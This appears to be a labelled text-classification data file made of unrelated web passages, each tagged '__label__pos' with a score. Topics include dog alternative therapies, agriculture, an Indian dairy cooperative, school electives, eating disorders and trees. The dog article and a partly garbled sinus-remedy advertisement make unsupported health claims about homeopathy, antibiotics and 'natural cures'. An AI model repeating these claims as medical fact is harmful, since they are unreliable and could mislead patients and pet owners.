Physical therapy includes massage and manipulative techniques (also known as chiropractic adjustments) to align the skeleton and the joints. This increases blood flow, relieves pressure on nerves, which subsequently alleviates pain. It also helps increase range of motion, which allows your dog to get around easier and more comfortably.
Physical manipulation can also improve the health of the body as a whole, improving cardiovascular function, digestion and respiratory function. By aligning the spinal column, pressure on nerves that regulate the body’s organs is released, restoring proper function and improving your dog’s overall health.
2. Acupuncture “Acupuncture is ahealing art that has been used in China for thousands of years to treat avariety of medical conditions,” says Dr. Rachel Barrack, veterinarian and founderof concierge practice, Animal Acupuncture in New York City. “It is consideredthe mainstay of traditional Chinese medicine.”
It is based on the idea that diseases and ailments are caused by energy blockage in the body. “Most acupuncture points are located along 14 major channels, which form a network that carries blood and energy throughout the entire body,” says Dr. Barrack.
The process involves acupuncturists inserting fine, sterile needles into points on the body to provide pain relief; stimulate the immune, endocrine, cardiovascular, digestive, and nervous systems; decrease inflammation and increase blood flow. This stimulation helps the body heal itself.
“Acupuncture produces a physiological response,” says Dr. Barrack. “It can also help restore balance between organ systems for optimal health and overall wellbeing. By decreasing inflammation, acupuncture alleviates discomfort associated with inflammatory conditions such as arthritis.”
3. Chinese Herbology
Chinese herbs are often used with acupuncture to help increase the effectiveness. Chinese herbal therapy is thousands of years old and uses medicinal plants that contain a vast variety of chemical compounds. Veterinarians practicing Chinese medicine may use as many as 50 herbs together to treat pain and discomfort resulting from age-related conditions.
Chinese herb therapy is designed to treat chronic conditions such as allergies, kidney and liver failure, skin and coat problems, along with behavioral problems like anxiety. These herbs come in several forms, including capsule, powder and tablet, that are easy to administer and to digest.
“Although cultivated from nature, Chinese herbs should always be thought of as medicine, and there is no ‘one-size-fits-all’ herbal formula for dogs with arthritis and other conditions,” says Dr. Barrack. “Herbs are prescribed depending on the individual needs of the patient.” But don’t try this on your own; always go to a vet certified in Chinese herbology.
4. Prolotherapy
Pioneered in sports medicine for the world’s elite human athletes, prolotherapy is an alternative orthopedic therapy that works rapidly to manage your aging dog’s pain and strengthen and stabilize the joints. “By administering controlled injections of natural proliferating agents, like dextrose mixed with lidocaine, into the damaged joint, it triggers a slight inflammatory response,” explains Dr. Babette. “Then the body’s natural healing mechanism kicks in, stimulating the formation of healthy new ligament and tendon tissues.”
5. Platelet Rich Plasma (PRP) and A-Cell
This regenerative technology can enhance the effects of prolotherapy. PRP, which is protein rich platelets, and A-Cell, which are stem cell equivalents, can provides relief for a dog’s hip and knees, increasing their mobility and decreasing their pain, says Dr. Babette. “The cell therapy uses your dog’s own immune response to activate the same processes the body would normally use, but amplified many times over.”
6. K-Laser Therapy
The K-Laser is a high-energy therapeutic laser, which is non-invasive, gentle, and extremely effective in healing stressed or damaged tissue, says Dr. Babette. “This naturally pain free treatment can alleviate pain, reduce inflammation, and promote growth tissue. It has also been known to improve overall health and comfort for dogs.”
During the process, the therapy is directed at the source of pain. It feels like a warm sensation, says Dr. Babette, but notes, it isn’t painful. He adds that many dogs fall asleep during the process. Using the laser may result in shorter recovery time, greater range of motion and a decrease in muscle spasms.
7. Ultrasound Therapy
Ultrasound therapy uses high-energy sound waves applied directly to injured tissue to provide immediate relief and eventual healing. The area that’s damaged absorbs the sound energy and then radiates heat, which stimulates collagen fibers, accelerating tissue and tendon growth and improving strength. It can be used to treat a variety of conditions and injuries, including tendon and ligament injuries, muscular pain, scar tissue, and swelling.
8. Homeopathic Remedies
Homeopathic medicine uses natural substances to stimulate the body’s natural healing process. It is based on the belief that “like cures like,” or substances that would cause particular symptoms in large doses, may stimulate the body’s immune system when given in a very diluted dose. These remedies, derived from plant and animal materials and minerals, and prescribed to treat the individual dog, may be extremely effective.
“There are also some lifestyle modifications owners can make at home to best help their aging dog,” suggests Dr. Barrack. “Continue exercising to help your pet maintain a healthy body weight and to keep the joints fluid and flexible.”
Changing your dog’s diet to exclude any inflammatory ingredients, such as grains and corn, is also a vital step, says Dr. Babette. “Either homemade food or nutritionally rich dog food are the best to feed your aging pup. Supplements like turmeric, glucosamine and Adequan are also beneficial without any harsh side effects.” You can also look at CBD oil.
It’s always important to consult with a veterinarian. You can go to one certified in both Western and alternative therapies to help you decide which will benefit your senior dogs and keep them healthy and happy long into their golden years.
|
__label__pos
| 0.532143
|
This primacy of production is even more pronounced in necessaries, particularly the most basic, like food and clothing. The producer of food will always need food; he is motivated to produce enough at least to ensure that he may eat. The consumer of food, on the other hand, is entirely dependent upon the producers of it. If the producers do not produce enough, or produce in too low a quality, the consumer dies. The same is true for a society as a whole: if that society fails to produce sufficient food, it must either import that food, compensating for that importation by some other valuable production, or simply go without, which clearly is not a viable option. Either way, it must produce rather than merely consume, and production is again seen to be primary; for without production, no consumption can occur. Which brings me to my present topic: the primacy of agriculture. By “agriculture” here I mean, very loosely, the production of food; it includes farming, gardening, animal husbandry, hunting, fishing, and anything else that results in some food product at the end. It’s clear from the foregoing that agriculture is the most necessary of all productive industries. Agriculture is the oldest and the greatest profession. Without a healthy agricultural base, all economies are doomed, for workers cannot work if they cannot eat. Before we worry about whether we’ve got enough motor vehicles, good enough highways, fast enough computers, and big enough office parks, we need to worry about whether we’ve got enough food. We take it entirely for granted these days, but we shouldn’t. It’s the bedrock of all human endeavor, the root of all human production. Without it, we can do nothing.
Without physical sustenance, no other work in a political community is possible. And yet, most Americans pay scant attention to what is required for food to be brought to their homes. In fact, many are content with the industrial system; they are just ignorant of the damage that it causes to the soil and to water systems and of the amount of energy required to keep it going.
Relocalization and sustainability require that more become farmers, but who is willing to do the work? How can we transform the major urban and suburban areas, and make farming more appealing and financially feasible? Would people be willing to pay more money for their food, when they can get it at lower prices from elsewhere, thanks to cheap gas?
|
__label__pos
| 0.802337
|
Dairy farming in India is an ‘all season’ business. Efficient management of a dairy farm is the key to success. In India cow farming and buffalo farming are the backbone of dairy industry. Karnataka Milk Federation (KMF) is the largest Cooperative Dairy Federation in South India, owned and managed by milk producers of Karnataka State. KMF has over 2.25 million milk producers in over 12334 Dairy Cooperative Societies at village level, functioning under 13 District Cooperative Milk Unions in Karnataka State. The mission of the Federation is to usher rural prosperity through dairy development.The study is done using secondary information from the existing literature such as relevant research based on books, articles.. Objectives of the study To study the overview of KMF in Karnataka and to analyses the growth and development of KMF in Karnataka. Owing to conductive climate and topography, animal husbandry, dairying and fisheries sectors have played prominent socio-economic role in India. They further also play a significant role in generating gainful employment in the rural sector, particularly among the landless, small and marginal farmers and women empowerment. KMF has played a pivotal role in strengthening the cooperative movement in the state since its inception.
|
__label__pos
| 0.87371
|
ISRAELI EDUCATION MARKET Date2016 Author
Awada, Saleh
MetadataShow full item record Abstract
In the past 50 years participation in the education system has increased and the upgrading of the occupational structure as a result of industrialization processes has created, inter alia, a demand for a skilled, sophisticated and highly educated labor force). Concurrently, educational qualifications have become important step for employment at the bottom of the occupational hierarchy. As most individuals in post-industrial societies attain secondary education, the proportion of occupations that require post-secondary education has grown, and is projected to continue growing. Although high-level credentials have become more important, there is relatively little research on the transition from higher education to work. This transition is usually conceptualized as labor market consequences of a very crude classification of vocational versus academic tracks in higher (mainly secondary) education. There are little number of researches that have explored labor market consequences using a detailed classification of tertiary education. In this article, we focus on two important aspects of tertiary education: type of given degree and field of study.
|
__label__pos
| 0.975159
|
Sinus Infection - Cure Your Sinus Problems Naturally Now! - Sinus Nurse Reports!
In the U. S. millions of dollars are spent every year for antibiotics and other medications that promise to bring relief to people with sinus infection but they don't work. and other s Sinus infection sinus problems account for millions of visits to clinics every year. These infections and are caused mostly by fungi but also bacteria and viruses. Sinusitis or sinus infections are one of the most common health complaints in the U. S. People are diagnosed usually after a reviewing of the patient's history and a physical examination, and going over the patient's symptoms, however many people are fully aware they have one without ever visiting their doctor.
Sinuvil Natural Sinusitis Remedy
Natural Sinusitis Remedy that treats sinus infection.
Formulated to Help Support:
Relieve sinus inflamation Solve the causes of sinus problems Boost your immune system Relieve sinus pressure and pain Naturally relieve pain and fever Help you to regain your sense of smell Unblock blocked nasal passages
Great Product
A common symptom that is usually but not always present if you have a sinus infection is yellowish mucous or phlegm. While green and clear mucous can be signs of other types of infections or problems, usually yellow mucous or sputum means the sinuses are infected. If you think you have a sinus infection make sure to note the color of your sputum. The sinuses drain down into the throat and you may feel a lump or something there from time to time. Sinusitis can also be a complication of an allergy too In people who have chronic sinusitis, the openings of the cavities are blocked and narrowed. Nasal secretions, debris, particles and infectious material back up into the one of the sets of sinus , often leading to pain and pressure but not always because it's systemic one can feel tired or lethargic. sinus cavities Your doctor may use a light to look into the sinuses that can be reached to look for any inflammation. If the light doesn't shine through, the sinuses then the sinuses are blocked. Not all the sinus cavities can be viewed this way however. There are actually four sets of sinuses located in your behind your face and in your head.
The sinuses are air-filled cavities. In healthy people, there are nasal openings that drain debris and mucous out of the cavities and into the nose. Of the many symptoms that can be present in a sinus infection they can include a stuffy nose, which can run for ten days or more and often two weeks if it isn't taken care of properly, a runny nose with clear, often yellow or sometimes green mucus, sometimes fever, daytime cough - especially in the morning, a scratchy throat, smelly breath - found often in young children, sometimes a swelling around the eyes, sinus headaches (it used to be thought they were uncommon but not anymore) and facial pain.
Save 40% Off The Retail Price
What People Said About Sinuvil Sinusitis Treatment
" Last month I had sinusitis, I couldn't stop the horrible pain above my eyes, Sinuvil helped me to get better in just a few days. thank you!" John from CO
If you have difficult breathing and a cough together these are usually symptoms of sinusitis or bronchitis. When sleeping at night if you lay flat, your sinuses may drain into your lungs. Sometimes this can cause pneumonia. If you have a full blown infection it is better to sleep propped up with pillows. The treatment of sinus infections should be to resolve the infection, reduce swelling and promote sinus drainage, prevent any serious complications, such as pneumonia, meningitis or brain abscess, and stop this process in its tracks. You may benefit from an air purifier if your sinus infections are allergy-related, or if you live in a smoke-filled environment or they occur too often. Commonly used medical therapies, including saline nasal sprays, humidification, moisturization and nasal irrigation can be very effective for anyone suffering from chronic . sinus infections There are drug-free, effective sinus treatments today that are totally natural. My friends and family members and others who have suffered for years with problems, sinus infections and constantly running noses or stuffed noses, no longer suffer today. Seek out these sinus sinus cures, 'busters' and natural treatments and get rid of your sinus problems forever. For more info on how I cured myself of chronic sinus infections go to a nurse's website http://www. -Solutions.com for tips, Sinus sinus treatments, natural sinus treatments, causes and remedies for all types including info on symptoms, surgery, nasal irrigation and sinus headaches
|
__label__pos
| 0.775684
|
Various drugs faculties instruct in health and medical disciplines which might be used rather than, or along with, standard drugs. Whereas complementary medication is used along with typical drugs, alternative medication is used instead of conventional drugs. Regulation and licensing of alternative medication and well being care providers varies between and inside countries. Alternative therapies are sometimes based mostly on faith , custom, superstition , belief in supernatural energies, pseudoscience , errors in reasoning , propaganda, fraud, or lies.
The authors compared their knowledge with previous research from the Twenties and Nineteen Thirties and located that their curve lined up very closely with earlier data on expected survival in a group of ladies, all comers, with untreated breast cancer.
Examples of alternative medical techniques that have developed in Western cultures include homeopathic drugs and naturopathic medication. Bioelectromagnetic-primarily based therapies involve the unconventional use of electromagnetic fields, such as pulsed fields, …
|
__label__pos
| 0.739305
|
Winter Study
Winter Study Electives
During the winter term, Buxton offers an array of intensive six-week classes to further enrich students’ educational experience. These courses emphasize integrated learning, hands-on experience and team-teaching. Listed on this page are the 2019 Winter Study courses.
Students will be introduced to three disciplines: metal welding, automotive repair, and wood-working along side professionals that work in these fields. Mike St.Pierre will instruct wood-working, shop and power-tool use and safety; Jacinda Deeley will introduce welding techniques for practical and sculptural applications with metal; Kevin Leonard of Flamingo Motors will oversee the dissembling of a car engine as a teaching tool, and cover basic car maintenance. There will be a writing component to this otherwise hands-on class and students will be expected to keep a weekly journal.
Does the idea of growing up freak you out? Do you ever wonder how you’re going to manage everything that comes along with “being an adult”? Fear not! In this class, we will embrace the “unknown” and deliver on the question “why didn’t they teach us this in school?” Each class will focus on a particular skill or skill set, such as filing your taxes, reading a map, changing a tire, feeding yourself, etc. We’d like your input as well and plan to meet casually once everyone is assigned to Winter Study classes to work on the list together. Come learn some practical information that you will definitely use again at some point in your life!
Maximum # of students: 8
Together, we will research the rights of citizens, legal residents, and undocumented immigrants in the United States. Using our research, we will create an illustrated guide that clearly and simply explains what people’s rights are in different situations. If we have some advanced or fluent Spanish speakers in the class, we will also create a Spanish version! Copies of our illustrated guide will be made available in the Holyoke Public Library, in Holyoke Massachusetts. We may do a little bit of field research and surveying to find out what kinds of issues and situations are most pressing for people in the Holyoke community. Everyone will participate in the research process and collaborate to contribute to the final product, but your role may vary depending on whether you are more interested in writing, translating, or illustrating.
If there is one space on campus that seems underutilized it is the barn lounge. This class will approach and potentially follow through on a design/build project aimed at reworking the lounge space in a way that will better serve that end of campus. Using a variety of design approaches and, if there is time, practical building techniques to fulfill our vision we will rework that vital social space. We may have even knock down a wall or two…
From early ballad operettas to raunchy burlesques, from exploitative minstrel shows to musical comedies and romances intended to build a sense of patriotism, from Yiddish musicals to the narrative musical of our time- musical theatre has reflected and shaped the development of American culture since the 1700s. Our current day examples mirror contemporary popular music (think “Hamilton,” “Dear Evan Hanson,” even “Rent” in the 90s)- but this has actually been a trend since the early 1900s, when popular songs were used as the score for musicals. In this class, we will learn about the history of American musical theatre. We’ll listen to, and think critically about, our favorite musical numbers. Most importantly, we’ll learn musical theatre performance skills, from singing to embodying a character on stage to interpreting the lyrics of a song. (Maybe we’ll even incorporate a dance number or two!) We’ll approach this class from the perspective of covering a rich array of American musical theatre through the decades, with at least two ensemble numbers and a number of solos and duets. This class will conclude in a musical review performed for the Buxton community. No performance experience is necessary!
In this class, students will work in their best heels to master stability, walking and doing turns in heels. Once that is established we will then work on learning a few moves à la Afro-beat or RuPauls Drag Race with the goal to create a routine AND simultaneously build self-confidence, self-awareness, and intuition. This class is offered in the spirit of getting us up and moving and feeling good about who we are. The only things required are a pair of heels that either fully cover the foot or have straps, and a willingness to be yourself, make mistakes and feel good doing so. Class will take place in the theatre (on the stage specifically).
This course offers an overview on language history and transformation. We will briefly explore the origin of language and dive into how languages change, mix, and interact with one another. We will focus on how and why Modern English became what it is today. In addition to exploring the history of language, the class will dedicate time to analyzing and debunking various language myths that pervade modern American society. Such myths include “Everyone Has an Accent Except Me”, “Italian is Beautiful, German is Ugly”, “Women speak too much”, etc. This class will involve readings from academic and non-academic sources. The course will also incorporate in-depth discussions, research, and a final project. Throughout the course we will watch a BBC documentary series on the history of English. You do not need to know a foreign language in order to take this class, though it can be quite helpful and illuminating.
Together we will design and build a high quality escape room from scratch. From start to finish this will involve deciding a theme, coming up with a story, developing a series of puzzles, and furnishing/finishing the room to fit the theme and include the puzzles. The ultimate goal is to create a commercial grade escape room that is both challenging and doable for a group of people (while requiring the group to work together). If completed successfully, it can then be used to challenge other members of the Buxton community
The goal of this course is to help students become more knowledgeable and able political actors. The course will cover multiple aspects of voting—different voting systems and possible reforms, gerrymandering, voter suppression, etc. It will also examine campaigns—how they are organized and run, how money is raised and spent, the software that helps identify what voters to contact (Geoffrey Feldman is a Buxton alum who has run numerous campaigns in Massachusetts and is interested in giving students an inside look). Once candidates are elected, we will look at how laws are written and passed and how citizens try to influence that process. We will examine the relative methods and effectiveness of lobbying, contacting representatives, giving money, internet activism and public protest. Geoffrey is trying to arrange for a few elected figures to visit the class and talk about their experiences. There will be a certain amount of outside reading and research expected for the class.
For hundreds of years, board games were static and unchanging artifacts of ancient design. These designs were uncritical and many times obtuse in their choices of rules and customs. Modern game development began to challenge these assumptions, and especially in the last 15 years games have developed revolutionary design elements. Cooperative games, simultaneous turns, group games, asymmetric games, catch-up mechanics have changed the field radically. We will first try to define what a game actually is, and then begin to dive into the mechanics and aesthetic elements that make a gaming experience. We will analyze board games with a critical eye, understanding how each piece in a game contributes (or doesn’t) to the final experience in playing that game, why certain pieces are necessary, and how they can be improved upon and combined. Our class time will consist of, predominantly, playing a game during class time and then analyzing it afterwards and outside of class, with written analyses for each game session. Finally, we will work exercises in improving current games and in making our games, with a final project to make a complete game using any mechanics or elements that students find most fun.
An important topic in the field of positive psychology is resiliency, the idea that one has the ability to bounce back quickly from adversity. How are some people able to quickly recover from an event in their life and become stronger after it? Do they think differently than other people do? Do they behave differently? Is resiliency a trait that some people possess or is it something that can be learned? These questions will be answered as we learn about the research conducted on the protective factors that help us build our resiliency such as, grit, mental agility, self-compassion, and optimism as well as read about evidence based strategies to help us improve our resiliency. Also, we will take a strength assessment and learn about the top strengths that resilient people have in common. The book we will read is “Mozart, Federer, Picasso, Beckham, and the Science of Success” by Matthew Syed, an Olympic table tennis athlete, who writes about resiliency in the perspective of sports, people who persist and develop traits that allow them to become superior performers, and that can be applied to school, life and business. The class will have two major assignments, a short paper (on a resilient individual of your choice) and a creative project, and outside of class there will be two discussion questions per week and readings from the book.
Testimonials
“Learning doesn’t stop when you leave the classroom, it’s continuing through every moment of the day and your life, constantly shaping and reshaping you.” “At Buxton you get to focus on what you want to be learning; whether it is social skills or in-depth studying- you learn to take responsibility of your education.” “Living your education means to not only learn things, but to use what you learn in your everyday life.” “To me, living your education means to be independent, to take charge, to not be afraid of asking for help, to learn from your peers, to love to learn, to take what you have learned from a loving environment and take it into the world.” “Your education is more than just your time in class, it’s your life as a whole. Learning is not limited to a teacher teaching you something in a classroom.” “To me, at Buxton, it’s not boundaries that you make, but the ones you break through.” “At Buxton, I can choose what I want to do with my education. I can design my own path and invest my time studying topics that I’m really interested in.” “At Buxton you can experience your intellectual development in a community that accepts your perspective of the world.” “I felt instantly at home when I stepped on the campus. At Buxton, we are in school 24/7. We learn things in the classroom, but we really learn valuable things outside of the classroom. We learn how to work with others and respect each other’s spaces. Our education surrounds us and we learn new things everyday.” “I chose Buxton over public school because I think I function better in a smaller environment. You’re able to get to know students and faculty on a deeper level, which is rare.” “Students should be happy when they are learning. They should not feel like studying is a burden to them. You learn things from your living space and environment - you are learning every second you are living.” “Living your education means you become an active learner. You are not just learning in the classroom or while you are doing your homework. You live your life learning and taking in the world’s various educations.” “Buxton has shown me that it is possible to forge close bonds with teachers as well as students. It also gives you the ability to try new things in an environment where there is no judgment.” “I chose Buxton for a small community-based education with focus on the individual as part of the world at large, along with the learning settings.” “I love the atmosphere and how tightly knit the community is. At Buxton you take what you learn in the classroom and use it in everyday life - you learn from the world around you and see how you can make it better.” “At Buxton you bring your education into everything you do, and learn important, relevant things that you can utilize all the time.” “At Buxton, wherever I go, whatever I do, I’m learning. Formal classes are just an extension of the learning that happens everywhere else in my life.” “Being academic feels important. It really helps forge relationships between students and faculty, which is such an important thing here. It is so important that the faculty live in the dorms and everyone has a faculty advisor. You get to know your teachers outside of school life and having those relationships really strengthens the joy I have in learning.” “To me, “live your education” means to aim for learning in everything you do - not just in the classes and schoolwork. Every experience in life has educational value, so the more experiences I have the more educated I can be.” “There are no boundaries between our times for learning and our times for living; this is because of the fact that we have classes at all different times of day, and because all our activities are intermingled with our classes. We live at the place we go to school, so people learn everyday all day even outside of the classroom.” “A sense that everybody matters, that you are in a community where everyone can make a difference and reach their full potential, where you are interdependent and you work together, and most importantly where you understand that you can do whatever you want to do and whatever it is that you do, you have got to make a difference. I think that, more than anything, defines my experience at Buxton.”
|
__label__pos
| 0.54296
|
One common symptom of an eating disorder is the perceived need to eliminate or restrict certain foods. Extreme restriction of certain foods may indicate the presence of a disorder such as Anorexia Nervosa or Orthorexia. Restricted food groups often include processed foods, fast foods, or foods that are higher in sugar and fats (snack items, sweets, and desserts).
Alternatively, someone struggling with Compulsive Overeating or Binge Eating Disorder might alternate between periods of severe overconsumption and total restriction. It is important that intensive work is done in treatment to normalize both one’s attitudes toward and intake of such foods when working to reintroduce that person to the variety, novelty, and pleasure of eating.
The term “all foods fit” is often used to emphasize that there are no “good” foods or “bad” foods. The idea that no food has a moral value is an important concept in removing judgments and distortions that often form in disordered eating beliefs and practices.
Unfortunately, it is also common for foods like fruits, vegetables, and whole grains to become associated with eating disorder patterns. For example, a client once said “Focusing on eating vegetables was something I did when I was restricting or I started focusing on clean eating. If I was having salads, it meant I was dieting, denying, or punishing myself.” In a situation where food is restricted, working on accepting and practicing the idea that all food has a place in a healthy diet is essential. By re-incorporating all of the vital components of a balanced diet, individuals can develop an eating pattern free of eating disorder behaviors.
|
__label__pos
| 0.94106
|
How Trees Talk And Why We Should Listen Trees are intelligent organisms that use an underground network to communicate. Learning to understand their language could help protect trees, benefit our ecology and improve our health.
Do you ever think about that tree you planted in grade school? Probably not, but take yourself back in time for a minute …
It’s Arbor Day. Every student and teacher is standing outside your school, holding small potted plants in hand. Amidst the chaos and excitement, you can vaguely remember a lesson going along with the day’s activities. If you were anything like me, you tuned most of it out, because hey, it was springtime and you were outside. These kinds of school days are what you live for at 8 years old.
So, you planted your tree, got the warm fuzzies for doing your part and never thought about it again.
Fast forward 20 years. Since that day in 2nd grade, over 300 billion trees have been harvested. The one tree you planted, while helpful, is just a splinter in the effort to combat climate change and the destruction of our delicate ecosystem.
Why Planting One Tree Is Important
Since the dawn of agriculture, our planet’s tree population has been cut by almost half. It is reported that 15 billion trees per year are harvested globally, with only
5 billion per year being planted to resupply. This isn’t counting the 4-5 million acres of forest fires that consume thousands of trees annually in the U.S. alone.
The effect of deforestation is a slow process, but not as slow as you might think. At the rate we’re currently going, Earth could be completely void of trees in just a few hundred years.
Trees play an important part in the planet’s carbon cycle, and without them, the earth’s ecosystem would be destroyed. Though the one tree you planted in grade school may seem insignificant, it wasn’t in vain. Here’s why:
Trees transform light from the sun, water from the ground and carbon dioxide from the air into food. During this process, trees also create oxygen,which gets released back into the atmosphere. Scientists believe that just one tree can provide a day’s supply of oxygen for four people. Trees remove harmful and even deadly pollutants from the air by breathing them in through their leaves. A single, healthy tree is believed to be able to store almost 50 pounds of carbon each year.The average American’s carbon footprint in the United States was estimated at 20 tons per year. It would take 800 trees—that’s almost two acres of trees spaced 10 feet apart—just to store one American’s yearly carbon use. Trees also trap airborne particles like dust, pollen, ash and smoke from the air. breathing air in Seattle equivalent to smoking 7 cigarettes. Trees are an extremely valuable weapon against diseases caused by poor air quality. Trees give us clean water: 97% of the world’s fresh water is stored in natural underground reservoirs called aquifers.These stores provide us with clean drinking water and irrigation water for our crops. After a tree has its fill of rain water, the excess runs past its roots and into the earth’s aquifers. Trees can filter soil pollutants, too. Water runoff from a farm contains up to 88% less nitrate and 76% less phosphorus after flowing through a forest. A single sugar maple tree can remove 140mg of chromium, 820mg of nickel, and 5,200mg of lead from the soil per year. Trees can create rain and prevent floods. One mature oak tree can transpire more than 100 gallons of water per day. Transpirationis when water is absorbed through tree roots and released through their leaves into the air as vapor. Studies have shown that significantly more rain is produced from clouds that travel over forests than clouds that do not. Trees are part of an important ecosystem that provides habitat and food for birds and other animals. In fact, trees are home to almost half the world’s species. Researchers have found that planting just one tree in an open pasture can increase bird biodiversity in the area from zero to 80. Trees help regulate temperature, and not just by providing physical shade from the sun. The evaporation from a single tree can produce the cooling effect of 10 room size air conditioners.
Trees are a vital factor in keeping our planet and its inhabitants alive and healthy. Despite human’s constant abuse of her throughout history, Mother Nature has learned to shift and heal in order to adapt to the constant changes. The good news is the U.S. has been adding to the forests steadily since the 1940’s. China, in an effort to battle overwhelming pollution, has a
plan to plant 32,400 square miles of trees in 2018 alone. In fact, over 120 countries have pledged to plant more trees and restore forests in response to the devastation consumerism has wreaked on planet Earth.
The Surprising Healing Benefit Of Trees
We’re at a time in history when global health is declining almost as quickly as healthcare costs are surging. The world’s population is desperate for safe and accessible ways to heal mentally, emotionally, and physically.
Trees may just be the answer we are looking for: studies have shown that spending quality time with our tree friends can lower blood pressure, decrease stress hormones, fight depression, accelerate healing, and improve immune system function. Because of this new research, many countries are putting more effort into planting trees and getting people outside.
In South Korea,plans to open almost 40 healing forests are already in the works. These retreats are open to everyone and offer activities like forest prenatal classes, barefoot garden walks, even programs for bullies to decrease their aggression.Their mission is simple: “to realize a green welfare state, where the entire nation enjoys well-being.” In Japan, millions of dollars and thousands of hours have been spent studying nature’s effects on the overall health of human beings. Researchers have extensively studied a practice called “shinrin-yoku,” which is essentially spending time outside, breathing in nature. As it turns out, the smell of nature is actually a huge part of its healing benefit. Trees produce what scientists call phytoncide, which is what gives trees their “woodsy” smell. This smell—the essential oil of nature—has provento provide impressive healing benefits. Forest therapy is considered so important in parts of Japan that it is often covered by healthcare benefits. In the United States, some pediatricians are prescribing natureto children as a form of preventative medicine. Ecotherapyhas been implemented by doctors across the nation to help ease symptoms of anxiety and accelerate healing.
In many countries, Licensed Forest Therapy Guides will walk you through nature, like a real-time guided meditation. Why do they choose nature over neighborhoods? It’s simple: a
2011 study compared walking through the city vs. walking through the forest. Although both activities required the same amount of physical effort, the forest walks decreased stress hormones and lowered blood pressure significantly more than walks through the city. Nature walkers also showed decreased activity in the subgenual prefrontal cortex—a part of the brain that is responsible for depression and negativity. Whether you pay for a retreat or frolic in the trees solo, forest therapy is happening all around the world with the same positive results, proving that nature may truly be the best medicine.
Talking Tree Roots
We know that humans, animals, and all living creatures cannot live without trees. But can trees live without one another?
Scientists are now discovering that trees are much more like humans than we ever thought. No longer are trees seen with a “survival of the fittest” mentality, competing for food, water, and sunlight.
Trees are actually much like families. They are social creatures and rely heavily on one another for survival. Mature “mother trees” suckle their young. Old, weaker trees (and even ancient stumps) are kept alive by their surrounding posterity. Friends strategically point their branches during growth so as not to overcrowd each other. They can even warn one another when there is danger. “A forest has an amazing ability to communicate and behave like a single organism — an ecosystem,” says Suzanne Simard, an ecologist at the University of British Columbia and a pioneer in the language of trees.
And, as it turns out, a lot of this communication is happening just beneath the soil. Peter Wohlleben, author of
“ ,” says that trees use an underground network to send and receive messages. This network, coined “The Wood Wide Web,” is made up of fungi that grow at root tips and connect one tree to another. With this network, trees are able to detect their surroundings and assist trees in need. If a seedling is weak or sick, the mother tree will send nutrients through her roots over to the struggling sapling. Trees that get attacked by bugs will send signals through the fungi so that neighboring trees can increase their own resistance to the threat. Wohlleben says that these family-like behaviors are so obvious to him, he can walk through a forest and tell which trees are working together. He says in his book: “[A] pair of true friends is careful right from the outset not to grow overly thick branches in each other’s direction. The trees don’t want to take anything away from each other … such partners are often so tightly connected at the roots that sometimes they even die together.” The Hidden Life Of Trees
Trees can even store memories. They are the
oldest living organism on earth, and Simard believes that these memory stores could have a lot to do with that. “They’ve lived for a long time and they’ve lived through many fluctuations in climate” Simard says. “They curate that memory in the DNA. The DNA is encoded and has adapted through mutations to this environment, so that genetic code carries the code for variable climates coming up.” The older trees share this DNA memory through the underground network in order to keep themselves—and their posterity—alive. The Importance Of Mindful Planting And Harvesting To Ecology
Trees aren’t selfish creatures. The Wood Wide Web connects over 80% of the planet’s land plants to one another, which allows for communication and the transfer of nutrients such as water, carbon and nitrogen between species. Deforestation is a devastation to this ecosystem.
While the U.S. forestry and forest products sector make up one of the most significant employers in U.S. manufacturing, some big steps are being made to make the industry more environmentally friendly. Paper mills aim to use every bit of the tree, even burning wood chips and bark to make renewable energy. The logging industry is being directed towards selectively thinning trees, rather than wiping out complete forests. And more recently, the White House has made plans for selective logging in order to keep catastrophic wildfires to a minimum.
Both Wohlleben and Simard believe that trees go far beyond the basic characteristics of life; they are living, breathing organisms with behaviors much like ours. While Simard knows that trees will likely be harvested and used for as long as human beings are on this planet, she urges us to practice compassion and consciousness when dealing with our ancient friends. “We’ve got to reimagine ourselves as part of this network,”
Simard says, “imagine yourself listening to all the other creatures … tap into that below ground network and become part of the conversation.” Simard points out that mindful harvesting is the key to keeping our forests and the ecological habitat it creates healthy and thriving for years to come. “When we do cut, we need to save the legacies, the mother trees,” she proposes, “so they can pass their wisdom on to the next generation of trees, so they can withstand the future stresses coming down the road.” She advocates for planting and allowing natural forest regeneration: “let Mother Nature have the tools she needs in order to heal herself,” she says.
Despite the global net loss of 10 billion trees per year, the growth of U.S. forests currently exceeds the amount harvested by more than 33%. This is a great start, but we all have a part to play in conservation. Here are some ways you can help protect our trees and the ecosystem they create:
Get involved:Organize a tree planting project in your community or volunteer at one. Be mindful:When you’re out for your daily (or weekly) dose of nature therapy, do not travel off trails and try not to disrupt the forest’s delicate ecosystem. That means no stomping around like Godzilla and certainly no carving your name into tree trunks (I’m looking at you, Carl + Kate forever). Don’t litter:Pack out what you pack in. This includes seemingly harmless things, such as orange peels and sunflower seed shells. They can take months to decompose and can attract wildlife and other critters towards trails. Camp smart: Alwaysmake sure your campfires are completely put out. Educate yourself:develop a relationship with the trees in your own backyard. Learn how to care for and fertilize them. Tend to sick trees and practice proper maintenance techniques. Go paperless:About 39% of the fibers used for making paper come from recycled materials, but we can still do more. Request that bills be sent electronically, print less when possible and opt for online magazine subscriptions. Reuse and recycle:many items made from tree matter can be reused, recycled, or repurposed. Reuse gift bags, repurpose old furniture or use old newspapers as gift wrap. The options are endless! Take it to your garden:Wood chips and sawdust from tree trimmings make excellent fertilizer when left to decompose in your garden. Contact your local arborist or landscaping company. Many times they will let home gardeners haul chips away for free. Chips hold 70% their volume in water, making them ideal for fruit-bearing trees. In the right climate, a tree can go without being watered for multiple years when it is fertilized with wood chips. They also give back to the ecosystem by providing food and nutrients for worms and microorganisms needed for optimum gardening. Get outside:Take some time to appreciate the part trees play in the delicate balance of nature. The more time we spend with Mother Nature, the more we will understand what we can do to help her, and in turn, help ourselves.
You may not often think of that tree you planted all those years ago, but Mother Earth does. She thanks you for it by using it as a tool to provide clean water, soil, oxygen and habitat for hundreds of living things. Because of your tree and the billions of trees being planted annually, we are quite literally sowing a better future for ourselves and generations to come. As the Chinese Proverb says, “The best time to plant a tree was twenty years ago. The second best time is now.”
So go ahead, hug a tree today! And better yet: plant one.
|
__label__pos
| 0.915712
|
Checking for direct PDF access through Ovid
Abstract
